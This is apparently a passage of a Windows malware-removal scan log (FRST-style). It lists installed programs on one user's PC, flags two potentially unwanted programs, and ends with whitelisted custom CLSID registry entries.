AutoCAD 2017 (HKLM\...\{28B89EEF-0001-0000-0102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
AutoCAD 2017 Language Pack - English (HKLM\...\{28B89EEF-0001-0409-1102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
Autodesk Advanced Material Library Image Library 2017 (HKLM-x32\...\{8ED2ED41-4455-449D-993C-751C039089B9}) (Version: 15.11.3.0 - Autodesk)
Autodesk App Manager 2016-2017 (HKLM-x32\...\{C0954809-F5DC-426C-847E-8409DE14E4C0}) (Version: 2.2.0 - Autodesk)
Autodesk AutoCAD 2017 - English (HKLM\...\AutoCAD 2017 - English) (Version: 21.0.52.0 - Autodesk)
Autodesk AutoCAD Performance Feedback Tool 1.2.5 (HKLM-x32\...\{8600F844-9AA5-412E-B6F2-F9C6CBCFD268}) (Version: 1.2.5.0 - Autodesk)
Autodesk BIM 360 Glue AutoCAD 2017 Add-in 64 bit (HKLM\...\{276A67E0-71EB-4827-B5F7-2ACF02BC1A5B}) (Version: 4.37.6853 - Autodesk)
Autodesk Desktop App (HKLM-x32\...\Autodesk Desktop App) (Version: 6.2.0.174 - Autodesk)
Autodesk Featured Apps 2016-2017 (HKLM-x32\...\{27C15055-713B-4D0E-881F-19598A2DFD59}) (Version: 2.2.0 - Autodesk)
Autodesk License Service (x64) - 3.1 (HKLM\...\{EB6FE58F-8576-4272-BB9C-6B47D9EDFA4D}) (Version: 3.1.26.0 - Autodesk)
Autodesk Material Library 2017 (HKLM-x32\...\{8FB9F735-D64C-4991-8D91-4CDDAB1ABDEE}) (Version: 15.11.3.0 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2017 (HKLM-x32\...\{3FBFBC43-9882-43FA-B979-2D53896747B3}) (Version: 15.11.3.0 - Autodesk)
Autodesk ReCap 360 (HKLM\...\{5F0F7049-0000-1033-0102-73A6DA3D7FA6}) (Version: 3.0.0.52 - Autodesk) Hidden
Autodesk ReCap 360 (HKLM\...\Autodesk ReCap 360) (Version: 3.0.0.52 - Autodesk)
AVS Audio Converter 8.0 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.0.2.541 - Online Media Technologies Ltd.)
Bastion (HKLM-x32\...\1423058311_is1) (Version: 2.0.0.6 - GOG.com)
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.3.0 - EA Digital Illusions CE AB)
bl (HKLM-x32\...\{2A075BB4-E976-4278-BF3F-E5C6945D84C0}) (Version: 1.0.0 - Your Company Name) Hidden
Blender (HKLM\...\{EA3C8A99-1565-44FF-89FC-926CEEB623B5}) (Version: 2.75.1 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BurnAware Premium 10.4 (HKLM-x32\...\BurnAware Premium_is1) (Version: - Burnaware)
CanoScan Toolbox Ver4.9 (HKLM-x32\...\{CA9BCD4D-B782-4637-8F1F-F9A328D3C244}) (Version: - )
CCleaner (HKLM\...\CCleaner) (Version: 5.12 - Piriform)
Cheat Engine 6.2 (HKLM-x32\...\Cheat Engine 6.2_is1) (Version: - Dark Byte)
Counter-Strike (HKLM-x32\...\Counter-Strike_is1) (Version: - Valve)
CSGO WaRzOnE (HKLM-x32\...\{15932E81-E7D6-477E-BB98-E2D0EABEEF1A}) (Version: 1.36.5.2 - Warzone) Hidden
CSGO WaRzOnE (HKLM-x32\...\CSGO WaRzOnE 1.36.5.2) (Version: 1.36.5.2 - Warzone)
Cuphead (HKLM-x32\...\1963513391_is1) (Version: 20170929 - GOG.com)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Deluge 1.3.12 (HKLM-x32\...\Deluge) (Version: - )
Dev-C++ (HKLM-x32\...\Dev-C++) (Version: 5.11 - Bloodshed Software)
DiskAid 6.4.7.0 (HKLM\...\DiskAid_is1) (Version: 6.4.7.0 - DigiDNA)
Driver Talent (HKLM-x32\...\{29FE44D7-BC89-4188-8B0E-F6BA073C15A5}_is1) (Version: 6.5.52.156 - OSToto Co., Ltd.)
DriverDR 6.3.0 (HKLM\...\DriverDR_is1) (Version: 6.3.0.0 - DriverDR.com)
Droid4X (HKLM-x32\...\Droid4X) (Version: 0.10.3 - Haiyu Dongxiang Co.,Ltd.)
Dropbox (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Dropbox) (Version: 41.4.80 - Dropbox, Inc.)
eBIRForms version v6.0 (HKLM-x32\...\eBIRForms_is1) (Version: v6.0 - )
ESN Sonar (HKLM-x32\...\ESN Sonar-0.70.4) (Version: 0.70.4 - ESN Social Software AB)
FARO LS 1.1.505.0 (64bit) (HKLM-x32\...\{8834451B-6209-4E02-9EF4-4EF9E3C1F70F}) (Version: 5.5.0.44203 - FARO Scanner Production)
FFmpeg (Windows) for Audacity version 2.2.2 (HKLM-x32\...\{9C7E31E3-017F-434C-AC40-24431A354A1E}_is1) (Version: 2.2.2 - )
FileZilla Client 3.30.0 (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\FileZilla Client) (Version: 3.30.0 - Tim Kosse)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
Garena - League of Legends (HKLM-x32\...\LoLPH) (Version: - Garena Online Pte Ltd.)
GeoGebra 5 (HKLM-x32\...\GeoGebra 5) (Version: 5.0.148.0 - International GeoGebra Institute)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
GitHub Desktop (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\GitHubDesktop) (Version: 1.3.4 - GitHub, Inc.)
Glyph (HKLM-x32\...\Glyph) (Version: - Trion Worlds, Inc.)
Google Cloud Printer (HKLM-x32\...\{74AA24E0-AC50-4B28-BA46-9CF05467C9B7}) (Version: 58.0.3020.0 - Google Inc.)
Google Drive (HKLM-x32\...\{9BC95947-92FD-438B-A168-C01F9A5B7292}) (Version: 2.34.7529.6838 - Google, Inc.)
Google Earth Pro (HKLM-x32\...\{ECF2E224-42F5-4E50-B58E-94CA70E85697}) (Version: 7.3.0.3832 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Graphmatica (HKLM-x32\...\{48366EDF-D329-499F-A91E-637355619790}) (Version: 2.4.2.1 - kSoft)
Hadouken (HKLM-x32\...\{20BBAC53-29AD-4469-B377-08504143B731}) (Version: 5.2.0 - Viktor Elofsson and contributors.)
HP Deskjet 2510 series Basic Device Software (HKLM\...\{293CC68A-32BA-4BA4-84BD-0DCF6583566F}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2510 series Help (HKLM-x32\...\{234DADAD-3C3C-4FB1-90A4-0AF015D56E18}) (Version: 27.0.0 - Hewlett Packard)
HP Deskjet 2510 series Product Improvement Study (HKLM\...\{4B3264AA-951A-4A6B-B837-125224261F12}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2510 series Setup Guide (HKLM-x32\...\{216C7F38-4BBC-4E9A-8392-C9FA21B54386}) (Version: 27.0.0 - Hewlett Packard)
HP Deskjet Ink Adv 2010 K010 Basic Device Software (HKLM\...\{A0B8ECA0-DBE8-4F1B-AA2F-CA864072CAAE}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Update (HKLM-x32\...\{97486FBE-A3FC-4783-8D55-EA37E9D171CC}) (Version: 5.005.000.002 - Hewlett-Packard)
HTC Driver Installer (HKLM-x32\...\{4CEEE5D0-F905-4688-B9F9-ECC710507796}) (Version: 4.17.0.001 - HTC Corporation)
HTC Driver Installer (HKLM-x32\...\{6D6664A9-3342-4948-9B7E-034EFE366F0F}) (Version: 3.0.0.007 - HTC Corporation)
iFunbox (v4.0.4106.1352) (HKLM-x32\...\iFunbox_is1) (Version: v4.0.4106.1352 - iFunbox DevTeam)
iLook 310 (HKLM-x32\...\{7EF900F4-61A8-4D95-8A65-488D3BECA206}) (Version: 1.0.4.15 - )
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!)
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
IPTInstaller (HKLM-x32\...\{08208143-777D-4A06-BB54-71BF0AD1BB70}) (Version: 4.0.8 - HTC)
iTunes (HKLM\...\{9946A4F7-E0FD-4A33-82D1-06CBFFBBB9F9}) (Version: 12.5.1.21 - Apple Inc.)
Java 7 Update 21 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.210 - Oracle)
Java 8 Update 40 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218040F0}) (Version: 8.0.400 - Oracle Corporation)
Junk Mail filter update (HKLM-x32\...\{F6F30C28-38AA-4DBA-AE0B-7E30238E61BB}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Junkies Client ULTIMATE Version 25.0.0.5 (HKLM-x32\...\{DF64A9F4-94D8-46B4-AF68-DD584CD6DD49}_is1) (Version: - planetcss.com, Inc.)
KeepVid Music(Version 8.2.2) (HKLM-x32\...\{ADBA24FE-D6F6-4B21-97F3-D58A327422E4}_is1) (Version: 8.2.2 - KeepVid)
LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version: - )
League of Legends (HKLM-x32\...\{868EC22E-7E82-4760-9265-3F2E705BF24B}) (Version: 1.25.000 - Riot Games) Hidden
M4a/Flac/Ogg/Ape/Mpc Tag Support Plugin for Media Player v 1.1 (HKLM-x32\...\M4a/Flac/Ogg/Ape/Mpc Tag Support Plugin for Media Player_is1) (Version: 1 - Softpointer Inc)
Manual CanoScan LiDE 25 (HKLM-x32\...\{C45EB9E5-7165-4FB0-8C31-77FC4743362F}) (Version: - )
Mendeley Desktop 1.10.3 (HKLM-x32\...\Mendeley Desktop) (Version: 1.10.3 - Mendeley Ltd.)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-007A-0409-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM-x32\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\SkyDriveSetup.exe) (Version: 17.0.2015.0811 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x64 8.0.61000 (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664 (HKLM-x32\...\{49e969a1-2990-464d-92b5-25f6f34573c6}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664 (HKLM-x32\...\{d2c8df0e-f15d-4426-9e51-f13f329f9cb4}) (Version: 12.0.40664.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25711 (HKLM-x32\...\{1bffbfc8-3cfb-4b1d-aca9-64f1c7c9f811}) (Version: 14.12.25711.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25711 (HKLM-x32\...\{f381fb0a-b38e-44ab-bca5-7f651c8c6b93}) (Version: 14.12.25711.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\{FD9D64F4-CAF5-3D23-845A-B843C78CC1A5}) (Version: 10.0.60830 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Minimal ADB and Fastboot version 1.2 (HKLM-x32\...\{06C90FCC-4C95-4142-A0AF-D3A4C12882DE}_is1) (Version: 1.2 - Sam Rodberg)
MobaXterm (HKLM-x32\...\{0BE362CD-7B7B-4F36-A718-E27C88D288A2}) (Version: 10.5.0.3582 - Mobatek)
Mobile Gamepad Server 1.1 (HKLM-x32\...\Mobile Gamepad Server) (Version: 1.1 - MMH Dev)
Movie Maker (HKLM-x32\...\{45898170-E68C-4F02-AA35-C2186BF347A3}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{B39A6825-EA20-43EA-AB2D-A6BC0298D9A1}) (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Mozilla Firefox 62.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 62.0.2 (x64 en-US)) (Version: 62.0.2 - Mozilla)
Mozilla Firefox 63.0 (x64 en-US) (HKLM\...\Mozilla Firefox 63.0 (x64 en-US)) (Version: 63.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.3 - Mozilla)
MSI Kombustor v4 0.6.3.3 (64-bit) (HKLM-x32\...\{F3D3CC6B-9AD7-4F43-8C69-40D5902FDC5C}}_is1) (Version: - MSI / Geeks3D)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
netcut version 3.5.4 (HKLM-x32\...\{6BE5152F-0885-4AA5-8385-4AD2D8472C71}_is1) (Version: 3.5.4 - arcai.com)
NiceHash Miner 2 0.2.2 (only current user) (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\08059810-bc78-5c10-942c-2092eebb5ec8) (Version: 0.2.2 - NiceHash d.o.o)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.4.5 - Notepad++ Team)
Nullsoft Install System (HKLM-x32\...\NSIS) (Version: 3.0 - )
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.3 - )
NVIDIA Graphics Driver 378.49 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 378.49 - NVIDIA Corporation)
NVIDIA Performance (HKLM-x32\...\InstallShield_{7C7F30F4-94E7-4AA8-8941-90C4A80C68BF}) (Version: 1.00.0000 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
NVIDIA System Monitor (HKLM-x32\...\InstallShield_{E9CFBE78-ED91-4FCF-9E6F-210E477E527D}) (Version: 1.00.0000 - NVIDIA Corporation)
NVIDIA System Update (HKLM-x32\...\InstallShield_{6F69C969-2942-4E7B-B594-75B37664B8BA}) (Version: 1.00.0000 - NVIDIA Corporation)
NVIDIA Update 2.13.0.21 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 2.13.0.21 - NVIDIA Corporation)
Online Weather (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Online Weather) (Version: 1.0 - Somoto Ltd.) <==== ATTENTION
osu! (HKLM-x32\...\{0998cd4a-f2df-409b-81ae-4e160cc2e821}) (Version: latest - ppy Pty Ltd)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM-x32\...\{90150000-001F-040C-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PC Data App (HKLM-x32\...\PCData App) (Version: - ) <==== ATTENTION
PdaNet+ for Android 4.19 (HKLM-x32\...\PdaNet_is1) (Version: - June Fabrics Technology Inc)
ph (HKLM-x32\...\{185F9795-9663-4F13-9EF9-307A282ADB5A}) (Version: 1.0.0 - Your Company Name) Hidden
PhotoScape (HKLM-x32\...\PhotoScape) (Version: - )
PHStat2 3.0.6 (HKLM-x32\...\{E52EB7D5-0DAD-4C4B-B1F1-D233577DF224}) (Version: 3.06 - Pearson Education, Inc.)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Pidgin (HKLM-x32\...\Pidgin) (Version: 2.12.0 - )
PrinterShare 2.3.07 (HKLM\...\{FA9BB954-1D36-4DD9-8E6B-45A1183F59B6}) (Version: 2.3.7.0 - Printer Anywhere Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Python 2.7.14 (HKLM-x32\...\{0398A685-FD8D-46B3-9816-C47319B0CF5E}) (Version: 2.7.14150 - Python Software Foundation)
Python 3.0.1 (64-bit) (HKLM\...\{de2f2d9c-53e2-40ee-8209-74da63cb060f}) (Version: 3.0.1150 - Python Software Foundation)
Python 3.6.5 (32-bit) (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{1890a32b-7881-4df6-8cc1-70fb0471662e}) (Version: 3.6.5150.0 - Python Software Foundation)
Python Launcher (HKLM-x32\...\{C093353B-F9EE-4A06-923D-C1B340B82886}) (Version: 3.6.6119.0 - Python Software Foundation)
R for Windows 3.1.0 (HKLM\...\R for Windows 3.1.0_is1) (Version: 3.1.0 - R Core Team)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.45.516.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7661 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver and Utility (HKLM-x32\...\{0DF70CB6-553A-4C57-8E6D-876322ECFB78}) (Version: 1.00.0179 - REALTEK Semiconductor Corp.)
Revo Uninstaller Pro 3.1.5 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.5 - VS Revo Group, Ltd.)
ROBLOX Player for Betts (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version: - ROBLOX Corporation)
ROBLOX Studio 2013 for Betts (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{2922D6F1-2865-4EFA-97A9-94EEAB3AFA14}) (Version: - ROBLOX Corporation)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games)
RStudio (HKLM-x32\...\RStudio) (Version: 0.98.953 - RStudio)
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (HKLM-x32\...\{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15024.8 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15024.8 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
ScanSoft OmniPage SE 4.0 (HKLM-x32\...\{C1E693A4-B1D5-4DCD-B68D-2087835B7184}) (Version: 15.00.0020 - Nuance Communications, Inc.)
SketchUp Import 2016-2017 (HKLM-x32\...\{063925DB-9D8C-48E2-8F04-1B7038B6C783}) (Version: 2.2.0 - Autodesk)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.)
Smart Technology Programming Software 7.0.1.12 (HKLM\...\{C745CDDF-A4EA-4448-87ED-D17F83B0EE39}) (Version: 7.0.1.12 - Mad Catz)
Spotify (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Spotify) (Version: 1.0.92.390.g2ce5ec7d - Spotify AB)
Task Killer (remove only) (HKLM-x32\...\Task Killer) (Version: - )
Unity Web Player (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\UnityWebPlayer) (Version: 5.3.2f1 - Unity Technologies ApS)
Uplay (HKLM-x32\...\Uplay) (Version: 46.0 - Ubisoft)
USBPcap 1.2.0.3 (HKLM\...\USBPcap) (Version: 1.2.0.3 - Tomasz Mon)
Viber (HKLM-x32\...\{703E9CCF-0578-4AF0-B1F7-90368CFDC8DD}) (Version: 5.3.0.1884 - Viber Media Inc.) Hidden
Viber (HKLM-x32\...\{86B6B943-6740-425C-9968-43EDEBEE6742}) (Version: 6.2.0.1306 - Viber Media Inc.) Hidden
Viber (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{d96d3a07-b1fd-4625-b739-627196eb9aac}) (Version: 6.2.0.1306 - Viber Media Inc.)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vulkan Run Time Libraries 1.0.37.0 (HKLM\...\VulkanRT1.0.37.0) (Version: 1.0.37.0 - LunarG, Inc.)
Watch_Dogs (HKLM-x32\...\Uplay Install 274) (Version: - Ubisoft)
WinCDEmu (HKLM-x32\...\WinCDEmu) (Version: 4.1 - Sysprogs)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (08/27/2012 7.0.0000.00001) (HKLM\...\1211A86ED343708C73F297C8FB074FB60918D24D) (Version: 08/27/2012 7.0.0000.00001 - Google, Inc.)
Windows Driver Package - Google, Inc. (WinUSB) AndroidUsbDeviceClass (08/28/2014 11.0.0000.00000) (HKLM\...\092555911492C6959D2596D612F52DCA71881CA2) (Version: 08/28/2014 11.0.0000.00000 - Google, Inc.)
Windows Driver Package - Microsoft PS Vita Type B (02/22/2013 6.1.7600.16385) (HKLM\...\A0EC80B5719D4DA4CF40C9219D7CB9CCAD6DBA40) (Version: 02/22/2013 6.1.7600.16385 - Microsoft)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation)
Windroy version 0.5.5 (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{7E07052F-A4CE-4932-B066-B9203888439F}_is1) (Version: 0.5.5 - Windroy, Inc.)
WinISO (HKLM-x32\...\WinISO) (Version: 6.4.0.5092 - WinISO Computing Inc.)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 4.20 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH)
WinSCP 5.13.4 (HKLM-x32\...\winscp3_is1) (Version: 5.13.4 - Martin Prikryl)
Wooxy version 1.5.0.7 (HKLM-x32\...\{C183CD14-47D8-4F98-AF06-4744CB834C8E}_is1) (Version: 1.5.0.7 - Chewy)
Yawcam 0.4.1 (HKLM-x32\...\{8FE96B14-E1F9-47BF-8BA1-A81467CD259B}_is1) (Version: - )

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{9AAF0EB6-42D8-46C1-A2EF-679511B37A0D}\localserver32 -> D:\AutoCAD 2018\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{B6EB585B-B467-4E46-A9C7-48D7D6FD26CB}\localserver32 -> D:\AutoCAD 2018\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2017\en-US\acadficn.dll (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
